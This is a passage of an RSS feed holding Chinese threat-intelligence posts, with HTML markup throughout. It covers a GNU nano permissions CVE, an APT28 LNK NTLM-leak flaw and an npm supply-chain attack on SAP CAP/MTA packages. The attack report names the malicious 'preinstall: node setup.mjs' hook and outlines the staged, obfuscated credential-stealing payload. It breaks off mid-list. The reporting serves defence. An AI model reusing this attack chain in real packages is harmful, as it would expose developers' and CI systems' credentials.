row;margin: -10px 0% 0px;transform: rotateX(180deg);-webkit-transform: rotateX(180deg);-moz-transform: rotateX(180deg);-o-transform: rotateX(180deg);justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;line-height: 0;box-sizing: border-box;"><div style="text-align: left;justify-content: flex-start;margin: 0px 0% 1px;transform: translate3d(-7px, 0px, 0px);-webkit-transform: translate3d(-7px, 0px, 0px);-moz-transform: translate3d(-7px, 0px, 0px);-o-transform: translate3d(-7px, 0px, 0px);display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 10px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;background-color: rgb(55, 113, 187);align-self: flex-start;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100034939" src="https://wechat2rss.xlab.app/img-proxy/?k=ba00a2a2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FodcL3w4qOqib6B3yud7Dbdekfs20WukoOzllFjpIaEYCo6Rric2JBVgO382qltG6tEBUTkibBnlhJMmC1dBFuyfCBTDavhwl7zCq7YWPlk2UQs%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;align-self: flex-start;flex: 100 100 0%;line-height: 0;letter-spacing: 0px;box-sizing: border-box;"><div style="transform: perspective(0px);-webkit-transform: perspective(0px);-moz-transform: perspective(0px);-o-transform: perspective(0px);transform-style: flat;box-sizing: border-box;"><div style="text-align: left;justify-content: flex-start;transform: translate3d(7px, 0px, 0px) rotateY(180deg);-webkit-transform: translate3d(7px, 0px, 0px) rotateY(180deg);-moz-transform: translate3d(7px, 0px, 0px) rotateY(180deg);-o-transform: translate3d(7px, 0px, 0px) rotateY(180deg);display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 10px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;background-color: rgb(55, 113, 187);align-self: flex-start;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100034936" src="https://wechat2rss.xlab.app/img-proxy/?k=65d8013d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FodcL3w4qOqibsemicibZX6BC6fpshvpjke5RfcOUIZUk2LRBqqmM3fqBGaIdRj3ta0ne4UAibicTRYcmicSgmBjqxPzPOyibdyKcZ7CT3wZ3a55niaY%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div></div></div></div></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">01</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">GNU nano 软件中存在CVE-2026-40556漏洞</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年4月28日</span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a href="https://cert.pl/en/posts/2026/04/CVE-2026-40556/" target="_blank">https://cert.pl/en/posts/2026/04/CVE-2026-40556/</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">GNU nano在创建用户~/.local目录时使用了过于宽松的权限（0777），当系统umask较为宽松（如容器环境或umask设置为0）时会导致该目录成为全局可写，本地攻击者可利用竞争窗口在更严格的子目录创建前写入恶意文件；该漏洞影响2.9.1至9.0以下版本，已在nano 9.0中修复。</span></p></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">02</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">APT28 零日漏洞补丁不完整导致 CVE-2026-32202 的出现</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年4月23日</span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a href="https://www.akamai.com/blog/security-research/2026/apr/incomplete-patch-apt28s-zero-day-cve-2026-32202" target="_blank">https://www.akamai.com/blog/security-research/2026/apr/incomplete-patch-apt28s-zero-day-cve-2026-32202</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">APT28利用恶意LNK文件中的Control Panel组件路径触发远程DLL加载，绕过SmartScreen实现远程代码执行；微软在修复该漏洞（CVE-2026-21510）时虽增加了信任验证，但仍留下零点击认证强制漏洞（CVE-2026-32202）：当资源管理器渲染恶意LNK文件时，会因图标提取而自动解析UNC路径并建立SMB连接，导致受害者NTLM哈希发送至攻击者服务器。</span></p></div><div style="margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: 40%;align-self: center;flex: 0 0 auto;box-sizing: border-box;"><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.5" data-s="300,640" data-type="gif" data-w="480" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100034938" src="https://wechat2rss.xlab.app/img-proxy/?k=b3b8a2ef&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FodcL3w4qOqicM5W0hPaI0xBghLxHxE2LGuzofGaVTibtiaybDQzhLLHqaMx7e6qDjZ7ynWoYxibNTWFrnrpA1freZ5zVFEsZwAkhao5l3oqZDo8%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div><div style="display: inline-block;vertical-align: middle;width: 60%;align-self: center;flex: 0 0 auto;box-sizing: border-box;"><div style="text-align: right;font-size: 14px;box-sizing: border-box;"><p style="margin: 0px 0px 5px;padding: 0px;box-sizing: border-box;"><span leaf="">点击</span><span style="color: rgb(55, 113, 187);box-sizing: border-box;"><span leaf="">阅读原文</span></span><span style="box-sizing: border-box;"><span leaf="">至</span><strong style="box-sizing: border-box;"><span leaf="">ALPHA 9.3</span></strong></span></p><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">即刻助力威胁研判</span></p></div></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p><a href="https://ti.qianxin.com/">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=b7db3ab8&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzI2MDc2MDA4OA%3D%3D%26mid%3D2247518591%26idx%3D1%26sn%3D1f6824aab3a7d1d8efd041f9749d226e">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Fri, 01 May 2026 10:31:00 +0800</pubDate>
    </item>
    <item>
      <title>供应链攻击永无眠：SAP CAP &amp; Cloud MTA npm 供应链攻击事件报告</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzI2MDc2MDA4OA==&amp;mid=2247518567&amp;idx=1&amp;sn=e3b68204c27e714e7179801b1e91c9e3</link>
      <description>这是一起针对 SAP CAP（Cloud Application Programming Model）和 Cloud MTA（Multi-Target Application）生态的精准 npm 供应链攻击。攻击者通过劫持/污染 SAP 官方维护的 npm 包，在安装阶段注入恶意引导程序，最终执行高度混淆凭证窃取与自传播框架。</description>
      <content:encoded><![CDATA[<p>原创 <span>威胁情报中心</span> <span>2026-04-29 22:40</span> <span style="display: inline-block;">四川</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=d0bfadce&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FodcL3w4qOqic37lj6UrPXO2KA2C3Ziadwk9VGly31ZuiaQDYicus2o3cCIx2emY0jKyichjSZcRt0ib8MTDJVnoRW82T8ibe2yY5pIXuDlYnUWMqzc%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>这是一起针对 SAP CAP（Cloud Application Programming Model）和 Cloud MTA（Multi-Target Application）生态的精准 npm 供应链攻击。攻击者通过劫持/污染 SAP 官方维护的 npm 包，在安装阶段注入恶意引导程序，最终执行高度混淆凭证窃取与自传播框架。</p>
  <div style="font-family: -apple-system-font,BlinkMacSystemFont, Helvetica Neue, PingFang SC, Hiragino Sans GB , Microsoft YaHei UI , Microsoft YaHei ,Arial,sans-serif;font-size: 16px;line-height: 1.75;text-align: left;"><p style="padding-left: 8px;border-left: 3px solid rgb(55, 113, 187);margin: 2em 8px 0.75em 0px;color: rgb(63, 63, 63);font-size: 17.6px;font-weight: bold;line-height: 1.2;"><strong><span leaf=""><span textstyle="" style="color: rgb(55, 113, 187);">事件概述</span></span></strong></p><p style="margin: 1.5em 8px;letter-spacing: 0.1em;color: #3f3f3f;"><span leaf="">这是一起</span><strong style="color: rgba(55, 113, 187, 1);font-weight: bold;font-size: inherit;"><span leaf=""><span textstyle="" style="color: rgb(62, 62, 62);">针对 SAP CAP（Cloud Application Programming Model）和 Cloud MTA（Multi-Target Application）生态的精准 npm 供应链攻击</span></span></strong><span leaf="">。攻击者通过劫持/污染 SAP 官方维护的 npm 包，在安装阶段（</span><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;"><span leaf="">preinstall</span></code><span leaf=""> 钩子）注入恶意引导程序，最终执行一个 </span><strong style="font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.75;text-align: left;letter-spacing: 0.1em;color: rgb(55, 113, 187);font-weight: bold;font-size: inherit;"><span leaf="" style="color: rgb(55, 113, 187);font-weight: bold;font-size: inherit;"><span textstyle="" style="color: rgb(62, 62, 62);">11.7 MB 的高度混淆凭证窃取与自传播框架</span></span></strong><span leaf="">。</span><span leaf=""><br/></span><span leaf="">影响范围集中在开发者本地环境和 CI/CD 流水线（GitHub Actions、云凭证等），属于“中小规模但高影响”攻击（Aikido 原话）。</span></p><h3 data-heading="true" style="padding-left: 8px;border-left: 3px solid rgba(55, 113, 187, 1);margin: 2em 8px 0.75em 0;color: #3f3f3f;font-size: 17.6px;font-weight: bold;line-height: 1.2;"><strong style="color: rgba(55, 113, 187, 1);font-weight: bold;font-size: inherit;"><span leaf="">事件时间线</span></strong></h3><ul style="list-style: circle;padding-left: 1em;margin-left: 0;color: #3f3f3f;" class="list-paddingleft-1"><li style="display: block;margin: 0.2em 8px;color: #3f3f3f;"><p><span leaf="">• </span><strong style="font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.75;text-align: left;letter-spacing: 0.1em;color: rgb(55, 113, 187);font-weight: bold;font-size: inherit;"><span leaf="" style="font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.75;text-align: left;letter-spacing: 0.1em;color: rgb(55, 113, 187);font-weight: bold;font-size: inherit;"><span textstyle="" style="color: rgb(62, 62, 62);">2026年4月29日 UTC 上午–中午</span></span></strong><span leaf="">：恶意版本陆续发布。</span></p></li><li style="display: block;margin: 0.2em 8px;color: #3f3f3f;"><p><span leaf="">• </span><strong style="font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.75;text-align: left;letter-spacing: 0.1em;color: rgb(55, 113, 187);font-weight: bold;font-size: inherit;"><span leaf="" style="font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.75;text-align: left;letter-spacing: 0.1em;color: rgb(55, 113, 187);font-weight: bold;font-size: inherit;"><span textstyle="" style="color: rgb(62, 62, 62);">同日下午</span></span></strong><span leaf="">：Socket Security 率先在 X 上公开警报（用户提供的推文）。</span></p></li><li style="display: block;margin: 0.2em 8px;color: #3f3f3f;"><p><span leaf="">• </span><strong style="font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.75;text-align: left;letter-spacing: 0.1em;color: rgb(55, 113, 187);font-weight: bold;font-size: inherit;"><span leaf="" style="font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.75;text-align: left;letter-spacing: 0.1em;color: rgb(55, 113, 187);font-weight: bold;font-size: inherit;"><span textstyle="" style="color: rgb(62, 62, 62);">同日下午</span></span></strong><span leaf="">：Aikido Security 发布博客，提供完整技术拆解、IOCs 和检测工具。</span><span leaf=""><br/></span><span leaf="">事件仍在快速发展中，npm 官方已 unpublish 部分恶意版本（尤其是 </span><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;"><span leaf="">@cap-js/sqlite@2.2.2</span></code><span leaf="">）。</span></p></li></ul><h3 data-heading="true" style="padding-left: 8px;border-left: 3px solid rgb(55, 113, 187);margin: 2em 8px 0.75em 0px;color: rgb(63, 63, 63);font-size: 17.6px;font-weight: bold;line-height: 1.2;"><strong><span leaf=""><span textstyle="" style="color: rgb(55, 113, 187);">受影响包及影响范围</span></span></strong></h3><p style="font-family: -apple-system-font,BlinkMacSystemFont, Helvetica Neue, PingFang SC, Hiragino Sans GB , Microsoft YaHei UI , Microsoft YaHei ,Arial,sans-serif;font-size: 16px;line-height: 1.75;text-align: left;max-width: 100%;overflow: auto;-webkit-overflow-scrolling: touch;"><table style="color: #3f3f3f;margin-top: 0 !important;"><thead><tr><th align="left" style="border: 1px solid #dfdfdf;padding: 0.25em 0.5em;color: #3f3f3f;word-break: keep-all;background: rgba(0, 0, 0, 0.05);text-align: left;"><p><span leaf="">包名称</span></p></th><th align="left" style="border: 1px solid #dfdfdf;padding: 0.25em 0.5em;color: #3f3f3f;word-break: keep-all;background: rgba(0, 0, 0, 0.05);text-align: left;"><p><span leaf="">恶意版本</span></p></th><th align="left" style="border: 1px solid #dfdfdf;padding: 0.25em 0.5em;color: #3f3f3f;word-break: keep-all;background: rgba(0, 0, 0, 0.05);text-align: left;"><p><span leaf="">每周下载量（约）</span></p></th><th align="left" style="border: 1px solid #dfdfdf;padding: 0.25em 0.5em;color: #3f3f3f;word-break: keep-all;background: rgba(0, 0, 0, 0.05);text-align: left;"><p><span leaf="">用途</span></p></th></tr></thead><tbody><tr><td align="left" style="border: 1px solid #dfdfdf;padding: 0.25em 0.5em;color: #3f3f3f;word-break: keep-all;text-align: left;"><p><span leaf="">mbt</span></p></td><td align="left" style="border: 1px solid #dfdfdf;padding: 0.25em 0.5em;color: #3f3f3f;word-break: keep-all;text-align: left;"><p><span leaf="">1.2.48</span></p></td><td align="left" style="border: 1px solid #dfdfdf;padding: 0.25em 0.5em;color: #3f3f3f;word-break: keep-all;text-align: left;"><p><span leaf="">52,000</span></p></td><td align="left" style="border: 1px solid #dfdfdf;padding: 0.25em 0.5em;color: #3f3f3f;word-break: keep-all;text-align: left;"><p><span leaf="">SAP Cloud MTA 构建工具</span></p></td></tr><tr><td align="left" style="border: 1px solid #dfdfdf;padding: 0.25em 0.5em;color: #3f3f3f;word-break: keep-all;text-align: left;"><p><span leaf="">@cap-js/sqlite</span></p></td><td align="left" style="border: 1px solid #dfdfdf;padding: 0.25em 0.5em;color: #3f3f3f;word-break: keep-all;text-align: left;"><p><span leaf="">2.2.2</span></p></td><td align="left" style="border: 1px solid #dfdfdf;padding: 0.25em 0.5em;color: #3f3f3f;word-break: keep-all;text-align: left;"><p><span leaf="">250,000</span></p></td><td align="left" style="border: 1px solid #dfdfdf;padding: 0.25em 0.5em;color: #3f3f3f;word-break: keep-all;text-align: left;"><p><span leaf="">CAP 本地 SQLite 集成（最常用）</span></p></td></tr><tr><td align="left" style="border: 1px solid #dfdfdf;padding: 0.25em 0.5em;color: #3f3f3f;word-break: keep-all;text-align: left;"><p><span leaf="">@cap-js/postgres</span></p></td><td align="left" style="border: 1px solid #dfdfdf;padding: 0.25em 0.5em;color: #3f3f3f;word-break: keep-all;text-align: left;"><p><span leaf="">2.2.2</span></p></td><td align="left" style="border: 1px solid #dfdfdf;padding: 0.25em 0.5em;color: #3f3f3f;word-break: keep-all;text-align: left;"><p><span leaf="">10,000</span></p></td><td align="left" style="border: 1px solid #dfdfdf;padding: 0.25em 0.5em;color: #3f3f3f;word-break: keep-all;text-align: left;"><p><span leaf="">CAP PostgreSQL 集成</span></p></td></tr><tr><td align="left" style="border: 1px solid #dfdfdf;padding: 0.25em 0.5em;color: #3f3f3f;word-break: keep-all;text-align: left;"><p><span leaf="">@cap-js/db-service</span></p></td><td align="left" style="border: 1px solid #dfdfdf;padding: 0.25em 0.5em;color: #3f3f3f;word-break: keep-all;text-align: left;"><p><span leaf="">2.10.1</span></p></td><td align="left" style="border: 1px solid #dfdfdf;padding: 0.25em 0.5em;color: #3f3f3f;word-break: keep-all;text-align: left;"><p><span leaf="">260,000</span></p></td><td align="left" style="border: 1px solid #dfdfdf;padding: 0.25em 0.5em;color: #3f3f3f;word-break: keep-all;text-align: left;"><p><span leaf="">CAP 数据库服务核心</span></p></td></tr></tbody></table></p><p style="margin: 1.5em 8px;letter-spacing: 0.1em;color: #3f3f3f;"><span leaf="">这些包是 </span><strong style="font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.75;text-align: left;letter-spacing: 0.1em;color: rgb(55, 113, 187);font-weight: bold;font-size: inherit;"><span leaf="" style="font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.75;text-align: left;letter-spacing: 0.1em;color: rgb(55, 113, 187);font-weight: bold;font-size: inherit;"><span textstyle="" style="color: rgb(62, 62, 62);">SAP BTP 开发者、CAP Node.js 项目、MTA 部署流水线</span></span></strong><span leaf=""> 的核心依赖。任何在 4 月 29 日暴露窗口内执行 </span><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;"><span leaf="">npm install</span></code><span leaf=""> 的环境均可能感染。</span></p><h3 data-heading="true" style="padding-left: 8px;border-left: 3px solid rgb(55, 113, 187);margin: 2em 8px 0.75em 0px;color: rgb(63, 63, 63);font-size: 17.6px;font-weight: bold;line-height: 1.2;"><strong><span leaf=""><span textstyle="" style="color: rgb(55, 113, 187);">攻击技术细节（Socket + Aikido 整合）</span></span></strong></h3><ul style="list-style: circle;padding-left: 1em;margin-left: 0;color: #3f3f3f;" class="list-paddingleft-1"><li style="display: block;margin: 0.2em 8px;color: #3f3f3f;"><p><span leaf="">• </span><strong style="font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.75;text-align: left;letter-spacing: 0.1em;color: rgb(55, 113, 187);font-weight: bold;font-size: inherit;"><span leaf="" style="font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.75;text-align: left;letter-spacing: 0.1em;color: rgb(55, 113, 187);font-weight: bold;font-size: inherit;"><span textstyle="" style="color: rgb(62, 62, 62);">入口</span></span></strong><span leaf="">：恶意版本在 </span><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;"><span leaf="">package.json</span></code><span leaf=""> 中新增 </span><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;"><span leaf="">&#34;preinstall&#34;: &#34;node setup.mjs&#34;</span></code><span leaf=""> 脚本（此前这些 SAP 官方包从未使用 preinstall）。</span></p></li><li style="display: block;margin: 0.2em 8px;color: #3f3f3f;"><p><span leaf="">• </span><strong style="color: rgba(55, 113, 187, 1);font-weight: bold;font-size: inherit;"><span leaf="" style="font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.75;text-align: left;letter-spacing: 0.1em;color: rgb(55, 113, 187);font-weight: bold;font-size: inherit;"><span textstyle="" style="color: rgb(62, 62, 62);">第</span></span><span leaf="" style="font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.75;text-align: left;letter-spacing: 0.1em;color: rgb(55, 113, 187);font-weight: bold;font-size: inherit;"><span textstyle="" style="color: rgb(62, 62, 62);">一阶段（setup.mjs）</span></span></strong><span leaf="">：Bun 运行时引导程序。</span></p></li><ul style="list-style: circle;padding-left: 1em;margin-left: 0;color: #3f3f3f;" class="list-paddingleft-1"><li style="display: block;margin: 0.2em 8px;color: #3f3f3f;"><p><span leaf="">• 检测 OS/架构 → 从 GitHub Releases 下载 Bun v1.3.13 ZIP（未经验证 HTTP 下载）。</span></p></li><li style="display: block;margin: 0.2em 8px;color: #3f3f3f;"><p><span leaf="">• 解压并立即执行 </span><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;"><span leaf="">execution.js</span></code><span leaf="">。</span></p></li></ul><li style="display: block;margin: 0.2em 8px;color: #3f3f3f;"><p><span leaf="">• </span><strong style="color: rgba(55, 113, 187, 1);font-weight: bold;font-size: inherit;"><span leaf="" style="font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.75;text-align: left;letter-spacing: 0.1em;color: rgb(55, 113, 187);font-weight: bold;font-size: inherit;"><span textstyle="" style="color: rgb(62, 62, 62);">第二阶段（execution.js</span></span><span leaf="" style="font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.75;text-align: left;letter-spacing: 0.1em;color: rgb(55, 113, 187);font-weight: bold;font-size: inherit;"><span textstyle="" style="color: rgb(62, 62, 62);">）</span></span></strong><span leaf="">：11.7 MB 混淆 payload（使用 </span><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;"><span leaf="">ctf-scramble-v2</span></code><span leaf=""> 字符串混淆）。</span></p></li><ul style="list-style: circle;padding-left: 1em;margin-left: 0;color: #3f3f3f;" class="list-paddingleft-1"><li style="display: block;margin: 0.2em 8px;color: #3f3f3f;"><p><span leaf="">• 行为特征：</span></p></li><ul style="list-style: circle;padding-left: 1em;margin-left: 0;color: #3f3f3f;" class="list-paddingleft-1"><li style="display: block;margin: 0.2em 8px;color: #3f3f3f;"><p><span leaf="">• 检测 CI 环境 → 非 CI 机器上 daemonize（后台驻留）。</span></p></li><li style="display: block;margin: 0.2em 8px;color: #3f3f3f;"><p><span leaf="">• 跳过俄罗斯 locale（可能规避特定沙箱）。</span></p></li><li style="display: block;margin: 0.2em 8px;color: #3f3f3f;"><p><span leaf="">• </span><strong style="font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.75;text-align: left;letter-spacing: 0.1em;color: rgb(55, 113, 187);font-weight: bold;font-size: inherit;"><span leaf="" style="font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.75;text-align: left;letter-spacing: 0.1em;color: rgb(55, 113, 187);font-weight: bold;font-size: inherit;"><span textstyle="" style="color: rgb(62, 62, 62);">凭证窃取</span></span></strong><span leaf="">（极全面）：</span></p></li><ul style="list-style: circle;padding-left: 1em;margin-left: 0;color: #3f3f3f;" class="list-paddingleft-1"><li style="display: block;margin: 0.2em 8px;color: #3f3f3f;"><p><span leaf="">• GitHub token（</span><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 